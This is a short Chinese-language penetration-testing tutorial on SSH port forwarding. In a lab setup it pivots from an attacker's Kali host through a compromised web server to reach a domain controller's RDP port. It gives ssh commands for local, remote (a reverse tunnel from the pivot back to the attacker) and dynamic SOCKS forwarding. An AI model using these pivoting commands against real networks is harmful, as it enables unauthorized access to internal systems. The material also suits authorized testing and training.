参数
-C:允许压缩数据
-f :后台运行,并推荐加上 -n 参数
-N:不执行远程命令
-g:允许远端主机连接本地转发的端口
-L:本地端口转发
-R:远程端口转发
-D:动态转发
-P:指定ssh端口
环境:
攻击机:10.10.10.55
web服务器:10.10.10.44(内网IP为192.168.52.44)
域控:192.168.52.99
本地转发
外部攻击机(kali)10.10.10.55可以访问web服务器10.10.10.44(内网IP为192.168.52.44),但是访问不了域控192.168.52.99,此时可以将10.10.10.44作为跳板机,在攻击机上访问域控的3389端口
在攻击机上执行下面的命令:
ssh -CfNg -L 1234:192.168.52.99(域控):3389 root@10.10.10.44(跳板机)
输入跳板机密码后,就可以在攻击机上通过访问1234端口来访问域控的3389端口
rdesktop 127.0.0.1:1234
远程转发
外部攻击机无法访问内网的web服务器和域控,但是web服务器可以访问外网,将web服务器做跳板机,将域控的3389端口代理到攻击机上的1234端口
在跳板机上执行命令
ssh -CfNg -R 1234:192.168.52.99(域控):3389 root@10.10.10.55(kali)
同样在攻击机上访问1234端口即可
动态转发
远端服务器有限制隔离,本地主机无法直接访问,需要将一台可以访问远端服务器的主机作为跳板,设置为代理端,来代理访问不能访问的资源
在攻击机上执行命令
ssh -CfNg -D 1080 root@10.10.10.44
浏览器设置网络代理,就可以通过浏览器访问域控资源